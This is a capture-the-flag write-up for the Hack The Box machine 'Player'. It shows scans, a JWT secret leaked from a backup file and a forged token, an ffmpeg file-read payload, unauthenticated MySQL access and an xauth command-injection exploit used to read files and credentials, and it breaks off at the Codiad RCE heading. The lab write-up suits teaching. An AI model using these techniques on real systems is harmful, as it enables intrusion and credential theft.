<!doctype html>
<!--
  Minimal Mistakes Jekyll Theme 4.15.1 by Michael Rose
  Copyright 2013-2019 Michael Rose - mademistakes.com | @mmistakes
  Free for personal and commercial use under the MIT license
  https://github.com/mmistakes/minimal-mistakes/blob/master/LICENSE
-->
<html lang="en" class="no-js">
  <head>
    <meta charset="utf-8">

<!-- begin _includes/seo.html --><title>Player - Hack The Box - hackcommander.io</title>
<meta name="description" content="Player was a tough one. Getting the initial shell on Player took me quite some time. Every time I got new credentials I thought I would be able to log in but there was always another step after. The trickiest part of the box for me was finding the .php~ extension to read the source code of the page. I had the hint from the chat application but I couldn’t connect the dots.">



<meta property="og:type" content="article">
<meta property="og:locale" content="en_US">
<meta property="og:site_name" content="hackcommander.io">
<meta property="og:title" content="Player - Hack The Box">
<meta property="og:url" content="http://localhost:4000/htb-writeup-player/">


  <meta property="og:description" content="Player was a tough one. Getting the initial shell on Player took me quite some time. Every time I got new credentials I thought I would be able to log in but there was always another step after. The trickiest part of the box for me was finding the .php~ extension to read the source code of the page. I had the hint from the chat application but I couldn’t connect the dots.">



  <meta property="og:image" content="http://localhost:4000/assets/images/htb-writeup-player/player_logo.png">





  <meta property="article:published_time" content="2020-01-18T00:00:00+01:00">





  

  


<link rel="canonical" href="http://localhost:4000/htb-writeup-player/">







  <script type="application/ld+json">
    {
      "@context": "https://schema.org",
      "@type": "Person",
      "name": "HackCommander",
      "url": "http://localhost:4000",
      "sameAs": null
    }
  </script>







<!-- end _includes/seo.html -->


<link href="/feed.xml" type="application/atom+xml" rel="alternate" title="hackcommander.io Feed">

<!-- https://t.co/dKP3o1e -->
<meta name="viewport" content="width=device-width, initial-scale=1.0">

<script>
  document.documentElement.className = document.documentElement.className.replace(/\bno-js\b/g, '') + ' js ';
</script>

<!-- For all browsers -->
<link rel="stylesheet" href="/assets/css/main.css">

<!--[if IE ]>
  <style>
    /* old IE unsupported flexbox fixes */
    .greedy-nav .site-title {
      padding-right: 3em;
    }
    .greedy-nav button {
      position: absolute;
      top: 0;
      right: 0;
      height: 100%;
    }
  </style>
<![endif]-->



    <!-- start custom head snippets -->

<!-- insert favicons. use https://realfavicongenerator.net/ -->

<!-- end custom head snippets -->

  </head>

  <body class="layout--single wide">

    <!--[if lt IE 9]>
<div class="notice--danger align-center" style="margin: 0;">You are using an <strong>outdated</strong> browser. Please <a href="https://browsehappy.com/">upgrade your browser</a> to improve your experience.</div>
<![endif]-->

    

<div class="masthead">
  <div class="masthead__inner-wrap">
    <div class="masthead__menu">
      <nav id="site-nav" class="greedy-nav">
        
          <a class="site-logo" href="/"><img src="/assets/images/masthead.png" alt=""></a>
                
        <ul class="visible-links"><li class="masthead__menu-item">
              <a href="/" >Home</a>
            </li><li class="masthead__menu-item">
              <a href="/year-archive/" >Posts</a>
            </li><li class="masthead__menu-item">
              <a href="/categories/" >Categories</a>
            </li><li class="masthead__menu-item">
              <a href="/tags/" >Tags</a>
            </li><li class="masthead__menu-item">
              <a href="/about/" >About</a>
            </li></ul>
        
        <button class="greedy-nav__toggle hidden" type="button">
          <span class="visually-hidden">Toggle menu</span>
          <div class="navicon"></div>
        </button>
        <ul class="hidden-links hidden"></ul>
      </nav>
    </div>
  </div>
</div>
    

    <div class="initial-content">
      


  
    



<nav class="breadcrumbs">
  <ol itemscope itemtype="https://schema.org/BreadcrumbList">
    
    
    
      
        <li itemprop="itemListElement" itemscope itemtype="https://schema.org/ListItem">
          <a href="http://localhost:4000/" itemprop="item"><span itemprop="name">Home</span></a>
          <meta itemprop="position" content="1" />
        </li>
        <span class="sep">/</span>
      
      
        <li class="current">Player - Hack The Box</li>
      
    
  </ol>
</nav>

  


<div id="main" role="main">
  
  <div class="sidebar sticky">
  


<div itemscope itemtype="https://schema.org/Person">

  
    <div class="author__avatar">
      

      
        <img src="/assets/images/avatar.png" alt="HackCommander" itemprop="image">
      
    </div>
  

  <div class="author__content">
    
      <h3 class="author__name" itemprop="name">HackCommander</h3>
    
    
      <p class="author__bio" itemprop="description">
        Pentester, Bug Bounty Hunter <br>and CTF Player
      </p>
    
  </div>

  <div class="author__urls-wrapper">
    <button class="btn btn--inverse">Follow</button>
    <ul class="author__urls social-icons">
      
        <li itemprop="homeLocation" itemscope itemtype="https://schema.org/Place">
          <i class="fas fa-fw fa-map-marker-alt" aria-hidden="true"></i> <span itemprop="name">Spain</span>
        </li>
      

      

      

      

      

      

      

      

      
        <li>
          <a href="https://www.linkedin.com/in/iván-santos-malpica-1023a11b4" itemprop="sameAs" rel="nofollow noopener noreferrer">
            <i class="fab fa-fw fa-linkedin" aria-hidden="true"></i> LinkedIn
          </a>
        </li>
      

      

      

      

      

      
        <li>
          <a href="https://github.com/hackcommander" itemprop="sameAs" rel="nofollow noopener noreferrer">
            <i class="fab fa-fw fa-github" aria-hidden="true"></i> GitHub
          </a>
        </li>
      

      

      

      

      

      

      

      

      

      

      

      

      

      

      <!--
  <li>
    <a href="http://link-to-whatever-social-network.com/user/" itemprop="sameAs" rel="nofollow noopener noreferrer">
      <i class="fas fa-fw" aria-hidden="true"></i> Custom Social Profile Link
    </a>
  </li>
-->
    </ul>
  </div>
</div>

  
  </div>


  <article class="page" itemscope itemtype="https://schema.org/CreativeWork">
    <meta itemprop="headline" content="Player - Hack The Box">
    <meta itemprop="description" content="Player was a tough one. Getting the initial shell on Player took me quite some time. Every time I got new credentials I thought I would be able to log in but there was always another step after. The trickiest part of the box for me was finding the .php~ extension to read the source code of the page. I had the hint from the chat application but I couldn’t connect the dots.">
    <meta itemprop="datePublished" content="January 18, 2020">
    

    <div class="page__inner-wrap">
      
        <header>
          <h1 id="page-title" class="page__title" itemprop="headline">Player - Hack The Box
</h1>
          
        </header>
      

      <section class="page__content" itemprop="text">
        
        <p class="page__meta">
          
            <i class="fa fa-fw fa-calendar" aria-hidden="true"></i> <time datetime="2020-01-18T00:00:00+01:00">January 18, 2020 </time>&emsp;
          
          
        </p>
        <p><img src="/assets/images/htb-writeup-player/player_logo.png" alt="" /></p>

<p>Player was a tough one. Getting the initial shell on Player took me quite some time. Every time I got new credentials I thought I would be able to log in but there was always another step after. The trickiest part of the box for me was finding the .php~ extension to read the source code of the page. I had the hint from the chat application but I couldn’t connect the dots.</p>

<h2 id="summary">Summary</h2>

<ul>
  <li>Scan for vhosts to find the dev, chat and staging websites.</li>
  <li>Find a hint about exposed source code by looking at the chat website.</li>
  <li>On the main webpage, perform directory bruteforcing and find the launcher page.</li>
  <li>The source code for PHP file used in the javascript AJAX call of the launcher page can be retrieved by appending a tilde to the file extension.</li>
  <li>The source code contains the JWT shared secret and we can now forge our own token to log in to the application.</li>
  <li>The media conversion web page uses ffmpeg in the backend which we can use to perform an LFI and retrieve the content of a service configuration file.</li>
  <li>The file contains the telegen user credentials which we can use to log into a lshell restricted shell.</li>
  <li>We can break out of the restricted shell by using enumerating the SSH configuration file through ffmpeg and seeing that xauth is enabled. The xauth exploit allows us to read files on the system and we find another set of credentials in some of the staging PHP code.</li>
  <li>The credentials for user peter allow us to log into the codiad application and create a PHP script inside of web directory path, give us RCE and a shell.</li>
  <li>By watching processes with pspy, we identify there’s a PHP script that runs regurlarly as root.</li>
  <li>The PHP script contains a deserialization vulnerability which we exploit to write SSH keys into the root directory and then log in with SSH.</li>
</ul>

<h2 id="fails">Fails</h2>

<ul>
  <li>When I decoded the JWT token found on the launcher page, I saw that the access_code was a SHA1 hash. When I looked up the hash online, I saw it was <code class="language-plaintext highlighter-rouge">welcome</code> and thought it was used to log into the server. It was useless after all… Womp womp.</li>
  <li>I was able to log into the MySQL server without any credentials by port-forwarding once I had creds for the lshell. Then saw I could update the stats table and thought about inserting PHP code into the page. But as it turns out, the string is inserted as part of the PHP code which is already running and querying the database so I ended with a nice <code class="language-plaintext highlighter-rouge">&lt;?php phpinfo(); ?&gt;</code> that wasn’t interpreted.</li>
</ul>

<h2 id="portscan">Portscan</h2>

<p>Running my portscan I see that a 2nd SSH service is running on port 6686 with a different version.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>root@ragingunicorn:~/htb/player# nmap -sC -sV -p- 10.10.10.145
Starting Nmap 7.70 ( https://nmap.org ) at 2019-07-06 19:03 EDT
Nmap scan report for player.htb (10.10.10.145)
Host is up (0.019s latency).
Not shown: 65532 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   1024 d7:30:db:b9:a0:4c:79:94:78:38:b3:43:a2:50:55:81 (DSA)
|   2048 37:2b:e4:31:ee:a6:49:0d:9f:e7:e6:01:e6:3e:0a:66 (RSA)
|   256 0c:6c:05:ed:ad:f1:75:e8:02:e4:d2:27:3e:3a:19:8f (ECDSA)
|_  256 11:b8:db:f3:cc:29:08:4a:49:ce:bf:91:73:40:a2:80 (ED25519)
80/tcp   open  http    Apache httpd 2.4.7
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: 403 Forbidden
6686/tcp open  ssh     OpenSSH 7.2 (protocol 2.0)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
</code></pre></div></div>

<h2 id="enumerating-the-website-on-port-80">Enumerating the website on port 80</h2>

<p>I add <code class="language-plaintext highlighter-rouge">player.htb</code> to my local hostfile and start enumerating the web site on port 80. The main page doesn’t seem to have any files that match the default directory index and indexing is disabled so I get a 403 Forbidden error.</p>

<p><img src="/assets/images/htb-writeup-player/mainpage_403.png" alt="" /></p>

<p>I will have to run gobuster to find something. As always, I will start with one of my go-to list: <code class="language-plaintext highlighter-rouge">big.txt</code> and add the <code class="language-plaintext highlighter-rouge">php</code> file extension.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>root@ragingunicorn:~/htb/player# gobuster -w /usr/share/seclists/Discovery/Web-Content/big.txt -t 25 -x php -u http://player.htb

/launcher (Status: 301)
/server-status (Status: 403)
</code></pre></div></div>

<p>Next, I look at the <code class="language-plaintext highlighter-rouge">/launcher</code> directory with the same wordlist:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>root@ragingunicorn:~/htb/player# gobuster -w /usr/share/seclists/Discovery/Web-Content/big.txt -t 25 -x php -u http://player.htb/launcher

/css (Status: 301)
/fonts (Status: 301)
/images (Status: 301)
/js (Status: 301)
/vendor (Status: 301)
</code></pre></div></div>

<p>Not much interesting seen with gobuster. I’ll check the link next with Firefox and see it’s a page about an upcoming product. There’s a countdown at the top and a link to register for product launch announcements.</p>

<p><img src="/assets/images/htb-writeup-player/launcher.png" alt="" /></p>

<p>Nothing seems to happen when I put an email address in the form. When I check the HTML source I see that the form goes to <code class="language-plaintext highlighter-rouge">dee8dc8a47256c64630d803a4c40786c.php</code>. That file just redirects to <code class="language-plaintext highlighter-rouge">/launcher</code> when we do a GET on it.</p>

<p><img src="/assets/images/htb-writeup-player/email_form.png" alt="" /></p>

<p>I could check the HTML source code for all the links on the page but instead I’ll use Burp instead to spider the site.</p>

<p><img src="/assets/images/htb-writeup-player/launcher_links.png" alt="" /></p>

<p>A couple of files stand out, those two filenames that look like an MD5 checksum and the javascript files for the site.</p>

<p><img src="/assets/images/htb-writeup-player/launcher_check.png" alt="" /></p>

<p>The <code class="language-plaintext highlighter-rouge">simplebuff.js</code> file does an AJAX call to <code class="language-plaintext highlighter-rouge">dee8dc8a47256c64630d803a4c40786e.php</code> every 10 seconds to check if the game has been released. The only response I see is <code class="language-plaintext highlighter-rouge">Not released yet</code>.</p>

<p>The <code class="language-plaintext highlighter-rouge">/launcher/dee8dc8a47256c64630d803a4c40786c.php</code> link does a GET and returns a cookie with a JWT token:</p>

<p><code class="language-plaintext highlighter-rouge">Set-Cookie: access=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJwcm9qZWN0IjoiUGxheUJ1ZmYiLCJhY2Nlc3NfY29kZSI6IkMwQjEzN0ZFMkQ3OTI0NTlGMjZGRjc2M0NDRTQ0NTc0QTVCNUFCMDMifQ.cjGwng6JiMiOWZGz7saOdOuhyr1vad5hAxOJCiM3uzU; expires=Tue, 06-Aug-2019</code></p>

<p>I’ll use <a href="https://jwt.io/">https://jwt.io/</a> to decode the JWT token contents:</p>

<p><img src="/assets/images/htb-writeup-player/jwt_token.png" alt="" /></p>

<p>The access code <code class="language-plaintext highlighter-rouge">C0B137FE2D792459F26FF763CCE44574A5B5AB03</code> is the SHA-1 hash for <code class="language-plaintext highlighter-rouge">welcome</code>.</p>

<p><img src="/assets/images/htb-writeup-player/crackstation.png" alt="" /></p>

<p>The access code doesn’t give me access to the actual PlayBuff page. There’s probably another code that I need to find or maybe I need to brute force the shared secret and forge my own token. At this point I’m not sure what I would forge in the token even if I had the secret key but I’ll start with the low hanging fruit and try <a href="https://github.com/AresS31/jwtcat">https://github.com/AresS31/jwtcat</a> just to see if the key can be recovered easily:</p>

<p><img src="/assets/images/htb-writeup-player/jwtcat.png" alt="" /></p>

<p>No luck in cracking the JWT token.</p>

<h2 id="finding-additional-vhosts">Finding additional vhosts</h2>

<p>Some boxes have multiple vhosts hosting different websites such as development pages, admin panels, etc. I’ll check out the vhosts by using wfuzz:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>root@ragingunicorn:~/htb/player# wfuzz --sc 200 -w /usr/share/seclists/Discovery/Web-Content/raft-small-words-lowercase.txt -H "Host: FUZZ.player.htb" 10.10.10.145

==================================================================
ID   Response   Lines      Word         Chars          Payload    
==================================================================

000231:  C=200     86 L	     229 W	   5243 Ch	  "dev"
000251:  C=200    259 L	     714 W	   9513 Ch	  "chat"
000796:  C=200     63 L	     180 W	   1470 Ch	  "staging"
</code></pre></div></div>

<p>I found 3 vhosts:</p>

<ul>
  <li><code class="language-plaintext highlighter-rouge">dev.player.htb</code></li>
  <li><code class="language-plaintext highlighter-rouge">chat.player.htb</code></li>
  <li><code class="language-plaintext highlighter-rouge">staging.player.htb</code></li>
</ul>

<h2 id="chatplayerhtb">chat.player.htb</h2>

<p>There’s a simulated chat application that shows a conversion between the PM and a developper.</p>

<p><img src="/assets/images/htb-writeup-player/chat.png" alt="" /></p>

<p>There are two hints here:</p>

<ol>
  <li>The staging area exposes senstive files</li>
  <li>The main page can show the source code of the application</li>
</ol>

<p>I ran gobuster and only found the pictures used for the chat application and some javascript files.</p>

<h2 id="devplayerhtb">dev.player.htb</h2>

<p>The <code class="language-plaintext highlighter-rouge">dev.player.htb</code> page show a login page:</p>

<p><img src="/assets/images/htb-writeup-player/codiad_login.png" alt="" /></p>

<p>I tried <code class="language-plaintext highlighter-rouge">admin / admin</code> and a few other obvious passwords but I couldn’t log in. From the HTML source code I can’t make up what this application is.</p>

<p>I ran gobuster and picked up a few directories.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>root@ragingunicorn:~/htb/player# gobuster -w /usr/share/seclists/Discovery/Web-Content/big.txt -t 25 -x php -u http://dev.player.htb 
/common.php (Status: 200)
/components (Status: 301)
/config.php (Status: 200)
/data (Status: 301)
/favicon.ico (Status: 200)
/index.php (Status: 200)
/js (Status: 301)
/languages (Status: 301)
/lib (Status: 301)
/plugins (Status: 301)
/server-status (Status: 403)
/themes (Status: 301)
/workspace (Status: 301)
</code></pre></div></div>

<p>I’m still not sure what it is based on the files found. I’ll expand my search to other extensions and see if I can pick up a readme file or something that tells me what this application is:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>root@ragingunicorn:~/htb/player# gobuster -w /usr/share/seclists/Discovery/Web-Content/big.txt -t 25 -x php,txt,conf,cfg -u http://dev.player.htb -s 200

/LICENSE.txt (Status: 200)
</code></pre></div></div>

<p>That license file tells me that this webapp is Codiad, a web-based IDE.</p>

<p><img src="/assets/images/htb-writeup-player/codiad_license.png" alt="" /></p>

<p>A quick search on google and exploit-DB shows there a few exploits like RCE and LFI but they require authentication. I’ll continue on and check the last of the vhosts.</p>

<h2 id="stagingplayerhtb">staging.player.htb</h2>

<p>The staging site seems to be in rough shape.</p>

<p><img src="/assets/images/htb-writeup-player/staging_home.png" alt="" /></p>

<p>The updates section display a static image simulating a metrics dashboard.</p>

<p><img src="/assets/images/htb-writeup-player/staging_updates.png" alt="" /></p>

<p>There’s a contact form to send messages to the Core team.</p>

<p><img src="/assets/images/htb-writeup-player/staging_contact.png" alt="" /></p>

<p>This could be an exploit vector for an XSS but the page errors out when I enter any data.</p>

<p><img src="/assets/images/htb-writeup-player/staging_501.png" alt="" /></p>

<p>When I check Burp, I see that the GET request returned some PHP output but the page redirect me to the <code class="language-plaintext highlighter-rouge">501.php</code> page right after.</p>

<p><img src="/assets/images/htb-writeup-player/staging_files.png" alt="" /></p>

<p>This is probably what the hint was referring to. The page shows two files that could be important: <code class="language-plaintext highlighter-rouge">/var/www/backup/service_config</code> and <code class="language-plaintext highlighter-rouge">/var/www/staging/fix.php</code>. I can’t read those right now but I’ll investigate the other hint: source code disclosure on the main page.</p>

<h2 id="leaking-the-shared-secret-for-the-jwt-token">Leaking the shared secret for the JWT token</h2>

<p>I tried many extensions for those two md5sum looking filenames until I found a temporary/swap file for <code class="language-plaintext highlighter-rouge">dee8dc8a47256c64630d803a4c40786c.php~</code></p>

<p><img src="/assets/images/htb-writeup-player/jwt_token_found.png" alt="" /></p>

<p>I now have the secret: <code class="language-plaintext highlighter-rouge">_S0_R@nd0m_P@ss_</code></p>

<p>It’s pretty clear from that partial source code that the site expects <code class="language-plaintext highlighter-rouge">0E76658526655756207688271159624026011393</code> as a valid access code. To forge a proper JWT token with that access code, I’ll just use <a href="https://jwt.io/">https://jwt.io/</a> again and enter the secret to compute the correct signature. When I initially just used the secret from the leaked source code it didn’t work so I followed the PHP code, converted the secret to Base64 with <code class="language-plaintext highlighter-rouge">base64_decode(strtr($key, '-_', '+/'))</code>:</p>

<p><img src="/assets/images/htb-writeup-player/jwt_token_forged.png" alt="" /></p>

<p>When I do a <code class="language-plaintext highlighter-rouge">GET /launcher/dee8dc8a47256c64630d803a4c40786c.php</code> with that access cookie I now get the secret Location URI:</p>

<p><img src="/assets/images/htb-writeup-player/jwt_token_location.png" alt="" /></p>

<p>Now I can access the application before it’s launch date at <code class="language-plaintext highlighter-rouge">http://player.htb/launcher/7F2dcsSdZo6nj3SNMTQ1/</code></p>

<p><img src="/assets/images/htb-writeup-player/playbuff.png" alt="" /></p>

<h2 id="exploiting-ffmpeg">Exploiting ffmpeg</h2>

<p>The web application is basically just a glorified media converter. You upload a media file and it gets converted to an <code class="language-plaintext highlighter-rouge">AVI</code> video container format.</p>

<p><img src="/assets/images/htb-writeup-player/playbuff_convert.png" alt="" /></p>

<p>I tried uploading PHP files and other non-media file types and I always got a 404 when I tried to follow the download link after:</p>

<p><img src="/assets/images/htb-writeup-player/playbuff_404.png" alt="" /></p>

<p>I couldn’t figure out any way to upload PHP code or figure out if my uploads were being saved to some temporary file that I could find the filename for. I did some research and found a vulnerability in ffmpeg which allows for an LFI inside video files.</p>

<p>I used the following payload: <a href="https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20Insecure%20Files/CVE%20Ffmpeg%20HLS">https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20Insecure%20Files/CVE%20Ffmpeg%20HLS</a></p>

<p>First I’ll try to read <code class="language-plaintext highlighter-rouge">/etc/passwd</code> with <code class="language-plaintext highlighter-rouge">python3 gen_avi_bypass.py /etc/passwd ~/htb/player/payload.avi</code></p>

<p>I then upload the video and view the resulting converted video:</p>

<p><img src="/assets/images/htb-writeup-player/passwd.png" alt="" /></p>

<p>Nice, the exploit works. Next, I’ll have a look at those files I previously found in the staging site.</p>

<p><code class="language-plaintext highlighter-rouge">python3 gen_avi_bypass.py /var/www/backup/service_config ~/htb/player/payload.avi</code></p>

<p><img src="/assets/images/htb-writeup-player/service_config.png" alt="" /></p>

<p>Cool, I found some credentials: <code class="language-plaintext highlighter-rouge">telegen / d-bC|jC!2uepS/w</code>. I’ll check the <code class="language-plaintext highlighter-rouge">fix.php</code> file next:</p>

<p><code class="language-plaintext highlighter-rouge">python3 gen_avi_bypass.py /var/www/staging/fix.php ~/htb/player/payload.avi</code></p>

<p>I can’t read that one. The resulting video file was empty so I probably don’t have access to it.</p>

<h2 id="restricted-shell">Restricted shell</h2>

<p>With the user <code class="language-plaintext highlighter-rouge">telegen</code> I’m able to SSH to the 2nd service running on port 6686 but I’m in restricted shell and can’t run any commands:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>root@ragingunicorn:~/htb/player# ssh -p6686 telegen@10.10.10.145
telegen@10.10.10.145's password: 
Last login: Tue Apr 30 18:40:13 2019 from 192.168.0.104
Environment:
  USER=telegen
  LOGNAME=telegen
  HOME=/home/telegen
  PATH=/usr/bin:/bin:/usr/sbin:/sbin:/usr/local/bin
  MAIL=/var/mail/telegen
  SHELL=/usr/bin/lshell
  SSH_CLIENT=10.10.14.11 55802 6686
  SSH_CONNECTION=10.10.14.11 55802 10.10.10.145 6686
  SSH_TTY=/dev/pts/0
  TERM=xterm-256color
========= PlayBuff ==========
Welcome to Staging Environment

telegen:~$ ls
*** forbidden command: ls
telegen:~$ help
  clear  exit  help  history  lpath  lsudo
telegen:~$ lpath
Allowed:
 /home/telegen 
telegen:~$ lsudo
Allowed sudo commands:
</code></pre></div></div>

<p>The <code class="language-plaintext highlighter-rouge">SHELL</code> environment variable points <code class="language-plaintext highlighter-rouge">lshell</code>. I don’t know that one so I’ll google it and discover that it’s web based python shell.</p>

<p>From the <a href="https://github.com/ghantoos/lshell">website</a> description:</p>

<blockquote>
  <p>lshell is a shell coded in Python, that lets you restrict a user’s environment to limited sets of commands, choose to enable/disable any command over SSH (e.g. SCP, SFTP, rsync, etc.), log user’s commands, implement timing restriction, and more.</p>
</blockquote>

<p>The configuration file is located here <code class="language-plaintext highlighter-rouge">/etc/lshell.conf</code>. Maybe there are some allowed commands that I need to find so I’ll exfil the config file using the same ffmpeg trick.</p>

<p><img src="/assets/images/htb-writeup-player/lshell_conf.png" alt="" /></p>

<p>I don’t see any allowed commands, nothing obvious stands out in the configuration. I can probably still port forward connections even if my shell is limited. I’ll do a dynamic port forwarding with <code class="language-plaintext highlighter-rouge">ssh -D 127.0.0.1:1080 -p 6686 telegen@10.10.10.145</code> so I can use a SOCKS proxy and port scan the box through proxychains.</p>

<p>I run a fast scan with nmap and find MySQL listening on localhost:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code># proxychains nmap -sT 127.0.0.1 -F
ProxyChains-3.1 (http://proxychains.sf.net)
Starting Nmap 7.70 ( https://nmap.org ) at 2019-07-08 23:16 EDT
Nmap scan report for localhost (127.0.0.1)
Host is up (0.018s latency).
Not shown: 97 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
3306/tcp open  mysql
</code></pre></div></div>

<h2 id="fail-at-mysql">Fail at MySQL</h2>

<p>Funny enough, I can connect to the MySQL server without any authentication:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>root@ragingunicorn:~/htb/player# proxychains mysql -h 127.0.0.1 -u root
ProxyChains-3.1 (http://proxychains.sf.net)
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MySQL connection id is 298
Server version: 5.5.62-0ubuntu0.14.04.1 (Ubuntu)

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MySQL [(none)]&gt; show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| integrity          |
| mysql              |
| performance_schema |
+--------------------+
4 rows in set (0.02 sec)
</code></pre></div></div>

<p>The <code class="language-plaintext highlighter-rouge">integrity</code> database contains a mapping of the token to filenames.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Database changed
MySQL [integrity]&gt; show tables;
+---------------------+
| Tables_in_integrity |
+---------------------+
| media               |
| stats               |
+---------------------+
2 rows in set (0.02 sec)

MySQL [integrity]&gt; select * from stats;
+------+----------------+
| id   | status         |
+------+----------------+
|    1 | no issues yet
 |
+------+----------------+
1 row in set (0.02 sec)

MySQL [integrity]&gt; select * from media;
+-----+----------------+------------+
| sno | video          | token      |
+-----+----------------+------------+
|  18 | 78683241.avi   | 673109167  |
|  19 | 1619102457.avi | 2112073545 |
|  20 | 490922722.avi  | 72247503   |
|  21 | 1530970781.avi | 1923945228 |
|  22 | 2129471110.avi | 672162071  |
+-----+----------------+------------+
5 rows in set (0.02 sec)
</code></pre></div></div>

<p>The <code class="language-plaintext highlighter-rouge">no issues yet</code> message is displayed at the bottom of the staging site <code class="language-plaintext highlighter-rouge">update.php</code> page. I can change it and try to inject PHP code on the page:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>MySQL [integrity]&gt; delete from stats where id=1;
Query OK, 1 row affected (0.02 sec)

MySQL [integrity]&gt; insert into stats (id, status) values (1, "&lt;?php phpinfo();?&gt;");
Query OK, 1 row affected (0.03 sec)
</code></pre></div></div>

<p>When I check the update page I don’t see anything on the product status and my PHP code hasn’t been executed. Looking at the HTML source code, I see that the PHP tag has been inserted into the code but no PHP code is executed.</p>

<p><img src="/assets/images/htb-writeup-player/staging_phptry.png" alt="" /></p>

<p>I can’t read arbitrary files with <code class="language-plaintext highlighter-rouge">LOAD_FILE</code> or write with <code class="language-plaintext highlighter-rouge">INTO OUTFILE</code>. <code class="language-plaintext highlighter-rouge">secure_file_priv</code> is configured so I can only read/write within the directory below:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>MySQL [integrity]&gt; SHOW VARIABLES LIKE "secure_file_priv";
+------------------+-----------------------+
| Variable_name    | Value                 |
+------------------+-----------------------+
| secure_file_priv | /var/lib/mysql-files/ |
+------------------+-----------------------+
1 row in set (0.02 sec)
</code></pre></div></div>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>MySQL [integrity]&gt; select load_file("/etc/passwd");
+--------------------------+
| load_file("/etc/passwd") |
+--------------------------+
| NULL                     |
+--------------------------+
1 row in set (0.02 sec)

MySQL [integrity]&gt; select * from stats into outfile "/tmp/test";
ERROR 1290 (HY000): The MySQL server is running with the --secure-file-priv option so it cannot execute this statement
MySQL [integrity]&gt; select * from stats into outfile "/var/lib/mysql-files/test";
Query OK, 2 rows affected (0.02 sec)

MySQL [integrity]&gt; select load_file("/var/lib/mysql-files/test");
+------------------------------------------+
| load_file("/var/lib/mysql-files/test")   |
+------------------------------------------+
| \N	&lt;?php phpinfo();?&gt;
1	no issues yet\

 |
+------------------------------------------+
1 row in set (0.02 sec)
</code></pre></div></div>

<p>This seems like a dead end so I will move on.</p>

<h2 id="openssh-xauth-vulnerability">OpenSSH xauth vulnerability</h2>

<p>There are a few CVE’s for version 7.2 of OpenSSH running on port 6686, one that could be interesting is the CVE-2016-3115: OpenSSH 7.2p1 - (Authenticated) xauth Command Injection. This should allow me to inject xauth commands by sending forged x11 channel requests. But <code class="language-plaintext highlighter-rouge">X11Forwarding yes</code> needs to be enabled for it to work. I’ll fetch the sshd config file with the ffmpeg exploit and hope it’s the one used by the sshd daemon running on port 6686.</p>

<p><img src="/assets/images/htb-writeup-player/sshd_config.png" alt="" /></p>

<p>X11Forwarding is enabled and it’s not a default configuration so this is probably a hint that I’m on the right track.</p>

<p>To run the exploit I just pass the IP/port and the credentials, then once it’s connected I can write and read files. To verify that’s it’s working correctly, I read <code class="language-plaintext highlighter-rouge">/etc/hostname</code> and see that it returns <code class="language-plaintext highlighter-rouge">player</code> as expected.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>root@ragingunicorn:~/htb/player# python xauth.py 10.10.10.145 6686 telegen 'd-bC|jC!2uepS/w'
INFO:__main__:connecting to: telegen:d-bC|jC!2uepS/w@10.10.10.145:6686
INFO:__main__:connected!
INFO:__main__:
Available commands:
    .info
    .readfile &lt;path&gt;
    .writefile &lt;path&gt; &lt;data&gt;
    .exit .quit
    &lt;any xauth command or type help&gt;

#&gt; .readfile /etc/hostname
DEBUG:__main__:auth_cookie: 'xxxx\nsource /etc/hostname\n'
DEBUG:__main__:dummy exec returned: None
INFO:__main__:player
#&gt;
</code></pre></div></div>

<p>I’ll grab the flag next since I know the user directory is <code class="language-plaintext highlighter-rouge">/home/telegen</code>:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#&gt; .readfile /home/telegen/user.txt
DEBUG:__main__:auth_cookie: 'xxxx\nsource /home/telegen/user.txt\n'
DEBUG:__main__:dummy exec returned: None
INFO:__main__:30e47ab....
</code></pre></div></div>

<p>On the staging site there was that <code class="language-plaintext highlighter-rouge">fix.php</code> file that was erroring out but I couldn’t read it from the ffmpeg exploit. I have access to read this file now with <code class="language-plaintext highlighter-rouge">telegen</code> and I can a potential set of credentials: <code class="language-plaintext highlighter-rouge">peter / CQXpm\z)G5D#%S$y=</code></p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#&gt; .readfile /var/www/staging/fix.php
DEBUG:__main__:auth_cookie: 'xxxx\nsource /var/www/staging/fix.php\n'
DEBUG:__main__:dummy exec returned: None
INFO:__main__:&lt;?php
class
protected
...
//modified
//for
//fix
//peter
//CQXpm\z)G5D#%S$y=
}
public
if($result
static::passed($test_name);
...
</code></pre></div></div>

<h2 id="remote-code-execution-through-codiad">Remote code execution through Codiad</h2>

